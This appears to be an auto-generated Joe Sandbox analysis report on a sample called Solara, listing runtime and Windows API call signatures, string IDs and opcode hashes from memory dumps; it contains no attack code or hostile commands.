                                                                                                                                      • API ID: InitVariant
                                                                                                                                      • String ID: ($*$,$.$/$0$2$4$6$8$:$<$>$D
                                                                                                                                      • API String ID: 1927566239-574869987
                                                                                                                                      • Opcode ID: 7f4fd56acec3c8d0c59e9e00ea6128d13164e0310569d91f22d445930b22dd7c
                                                                                                                                      • Instruction ID: d88a7ece5d961f4d5d686885019280e1f7b2d94b427488d7bead15871f2f4855
                                                                                                                                      • Opcode Fuzzy Hash: 7f4fd56acec3c8d0c59e9e00ea6128d13164e0310569d91f22d445930b22dd7c
                                                                                                                                      • Instruction Fuzzy Hash: 33412A3400C7C18ED326DB78845875AFFE19B97328F484A9DE1E54B2D2D7B6840ACB67
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 127012223-0
                                                                                                                                      • Opcode ID: d46ea88ba2381b5599d096642b70a69e44bc4cd434c44688d288479a2ba834c9
                                                                                                                                      • Instruction ID: 3f935af11bf4ce49837cc047e1577b5af0a57c058ab7c46c27e863c80d105e4e
                                                                                                                                      • Opcode Fuzzy Hash: d46ea88ba2381b5599d096642b70a69e44bc4cd434c44688d288479a2ba834c9
                                                                                                                                      • Instruction Fuzzy Hash: 0F71F63292022A7BDF319EE4AC42BEE77BADF59710F140056E804A7992E7758C61CB52
                                                                                                                                      APIs
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0020FE70
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0020FE9C
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0020FEDB
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020FEF8
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0020FF37
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0020FF54
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0020FF96
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0020FFB9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2040435927-0
                                                                                                                                      • Opcode ID: 80ddb3a95b770e44cf7496b57b52db33d12645f3daec6add571a5b7fbec8636f
                                                                                                                                      • Instruction ID: 3934f59a70484c1caab02ee096d72cbdd7348c5534277310c53225b6f7d10453
                                                                                                                                      • Opcode Fuzzy Hash: 80ddb3a95b770e44cf7496b57b52db33d12645f3daec6add571a5b7fbec8636f
                                                                                                                                      • Instruction Fuzzy Hash: 4F51AD7266031BABEB705F60CD49FAA7AA9EF41750F244435F910DA9D2DB70DC208B50
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strrchr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                      • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                      • Instruction ID: 3a281bac7989c28f4deb643dff084ae60454cf7878b980c52566595a27b5f233
                                                                                                                                      • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                      • Instruction Fuzzy Hash: D0B16972A20356AFDF118F64CC41BEE7BE5EF29310F154165EC54AB282D274DDA2CBA0
                                                                                                                                      APIs
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00210D77
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00210D7F
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00210E08
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00210E33
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00210E88
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                      • Opcode ID: b86116adf2776cfc88a52e5cbab73e21ca22e1ae1ff062eca13548c221216d20
                                                                                                                                      • Instruction ID: da9a1e47c2c652f11023a92153f95c9a055712a59543726401bbe0a6fde1f9a0
                                                                                                                                      • Opcode Fuzzy Hash: b86116adf2776cfc88a52e5cbab73e21ca22e1ae1ff062eca13548c221216d20
                                                                                                                                      • Instruction Fuzzy Hash: 82410330A20219ABCF11DF69D884ADE7BF5EF15314F148455E9149B352CBB1AEE1CF90
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00203CA5
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00203CBF
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00203CE0
                                                                                                                                      • __Getctype.LIBCPMT ref: 00203D92
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00203DD8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                      • String ID: e.#
                                                                                                                                      • API String ID: 3087743877-406694023
                                                                                                                                      • Opcode ID: 0f92c4d35f0ad8f8bcf27e0de73a90dbec4a7e9e34fa787b898b3b35d2521c51
                                                                                                                                      • Instruction ID: 9d9076c9775e17e55623fa08f11e663681790c27c41aa31ac6ece3f6abbbf367
                                                                                                                                      • Opcode Fuzzy Hash: 0f92c4d35f0ad8f8bcf27e0de73a90dbec4a7e9e34fa787b898b3b35d2521c51
                                                                                                                                      • Instruction Fuzzy Hash: 7C4154B1E103198FCB14DF98E845BAEB7B9FF84720F148219D8156B392DB34AA11CF91
                                                                                                                                      APIs
                                                                                                                                      • GetConsoleWindow.KERNEL32 ref: 002024DD
                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 002024E6
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00202524
                                                                                                                                        • Part of subcall function 0020F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0020253A,?,?,00000000), ref: 0020F129
                                                                                                                                        • Part of subcall function 0020F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,0020253A,?,?,00000000), ref: 0020F142
                                                                                                                                        • Part of subcall function 0020F11D: CloseHandle.KERNEL32(?,?,?,0020253A,?,?,00000000), ref: 0020F154
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00202567
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00202578
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00202589
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 0020259A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3956949563-0
                                                                                                                                      • Opcode ID: 8f0bfedb98bff44b0d765fc00334173bd28a62b6e2727953b3944cf05af6038b
                                                                                                                                      • Instruction ID: 5faf7575d5d43e78788dc654e76749fcbaa085a2b43abdb669e4e7a632a011a4
                                                                                                                                      • Opcode Fuzzy Hash: 8f0bfedb98bff44b0d765fc00334173bd28a62b6e2727953b3944cf05af6038b
                                                                                                                                      • Instruction Fuzzy Hash: ED2196F2D503159BDF10AF949C0ABDEBAB8AF04710F180165F508772C2E7B69964CBA6
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,0021D01A,00201170,0020AA08,?,?), ref: 0021CFCC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                                      • Opcode ID: 9f01110aa240232cced4f4c41c9d36b916c8d1e7b44793d168e73164864729aa
                                                                                                                                      • Instruction ID: 2bc863ddd19a7f49c185fb425c2d49b46b268afaf40ace4406ff3fe68f9753a0
                                                                                                                                      • Opcode Fuzzy Hash: 9f01110aa240232cced4f4c41c9d36b916c8d1e7b44793d168e73164864729aa
                                                                                                                                      • Instruction Fuzzy Hash: BB213839BA1312BBC7318F64FC49A9A77A9AB61360F340113FC05A7690D730ED61CAD0
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00210086
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00210094
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002100A5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                      • API String ID: 667068680-1047828073
                                                                                                                                      • Opcode ID: 7542640ea8b84392878c26c0a2be84b13187db75d132a599834c88f7f7f7fb0f
                                                                                                                                      • Instruction ID: 76e01de0827f91b766ce5bccb534bc8c8d78a1dab27a5690efe076d6dd39ec90
                                                                                                                                      • Opcode Fuzzy Hash: 7542640ea8b84392878c26c0a2be84b13187db75d132a599834c88f7f7f7fb0f
                                                                                                                                      • Instruction Fuzzy Hash: 97D0C771661610BFC310AFF47C0D9893EBDFA0BB127019953F441E2360DF749A118B54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 93a36c927d8da575638d4d36bf0ac5079e92cd10c059688db4d8fd3afb819654
                                                                                                                                      • Instruction ID: a52357d37ccc8a9f362264ad3fd8f3e85849899b52d0f9cd9193d72c69bae1d3
                                                                                                                                      • Opcode Fuzzy Hash: 93a36c927d8da575638d4d36bf0ac5079e92cd10c059688db4d8fd3afb819654
                                                                                                                                      • Instruction Fuzzy Hash: 16B1F570E24A79BFDB01DFE8E844BADBBB4BF55300F148259E90497291C7B19961CFA0
                                                                                                                                      APIs
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209C97
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209CA8
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209CBC
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209CDD
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209CEE
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209D06
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Cpp_errorThrow_std::_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2134207285-0
                                                                                                                                      • Opcode ID: 44d4f58e2cd27037f9ded942be57fa3834a00201aba75a7f43d3aaae74453a63
                                                                                                                                      • Instruction ID: 6c09b857233c83cbfe0d8fd91e125b4bce893853a3c955604012bf52456b0e8e
                                                                                                                                      • Opcode Fuzzy Hash: 44d4f58e2cd27037f9ded942be57fa3834a00201aba75a7f43d3aaae74453a63
                                                                                                                                      • Instruction Fuzzy Hash: 5B41C2B1D10745CBEB309F6089457AFB7F4AF49324F18062EE56B162D3D37169A0CB52
                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,0021ACDE,00210760,0020B77F,BB40E64E,?,?,?,?,0022BFCA,000000FF), ref: 0021ACF5
                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0021AD03
                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0021AD1C
                                                                                                                                      • SetLastError.KERNEL32(00000000,?,0021ACDE,00210760,0020B77F,BB40E64E,?,?,?,?,0022BFCA,000000FF), ref: 0021AD6E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                      • Opcode ID: 99df4595ac02a90867010539c0ef2f99e1d33610cc89176bd23ad50e91654456
                                                                                                                                      • Instruction ID: 6f9a10b96b75e99205b4bb38858fed242ffb7e8d8b82cf90685647df49911446
                                                                                                                                      • Opcode Fuzzy Hash: 99df4595ac02a90867010539c0ef2f99e1d33610cc89176bd23ad50e91654456
                                                                                                                                      • Instruction Fuzzy Hash: A901DD32237A176DE7251EB87C4E9A626C4E711B75720032BF610559F0EF518CA65981
                                                                                                                                      APIs
                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0021B68D
                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0021B906
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                      • API String ID: 2673424686-393685449
                                                                                                                                      • Opcode ID: 5cd7eec817a08e1f08a041c4337346025afa8660d18a2b89c797964e8f718308
                                                                                                                                      • Instruction ID: 91b7205d6d4ba6f12f2544846b736faf77cc5e549de92869023f1033278a1f91
                                                                                                                                      • Opcode Fuzzy Hash: 5cd7eec817a08e1f08a041c4337346025afa8660d18a2b89c797964e8f718308
                                                                                                                                      • Instruction Fuzzy Hash: 71B1697182020AEFCF16DFA4C8819EEB7F9AF64310F15455AE811AB212D731DAB1CF91
                                                                                                                                      APIs
                                                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0020BF44
                                                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0020C028
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                                                      • Opcode ID: 0e6e0493a662e920c69daef9dad3fd5070456f77a1059981bc1ed563e24ca426
                                                                                                                                      • Instruction ID: f073652bef62ecf06793c98262a9b8d722c88c4d01cdcd938c0b5189ba7f9f0a
                                                                                                                                      • Opcode Fuzzy Hash: 0e6e0493a662e920c69daef9dad3fd5070456f77a1059981bc1ed563e24ca426
                                                                                                                                      • Instruction Fuzzy Hash: 6B41CB70910306DFCF3ADF28C8499ADB7B5AF18300F58806DE449A7A93C734AA60CF51
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0022BE94,000000FF,?,00215685,?,?,00215721,00000000), ref: 002155F9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0021560B
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,0022BE94,000000FF,?,00215685,?,?,00215721,00000000), ref: 0021562D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.2897717138.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.2897692347.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897741148.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897758044.000000000023A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897773153.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897787717.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                      • Opcode ID: eecc62935e6a061e89d485c53a05ba0ef9d187139d393a87ca8557f25b9a7c78
                                                                                                                                      • Instruction ID: bca9af060ec553f54d988b251719f070f6e3765a1ad699e54fd17e0787db9282
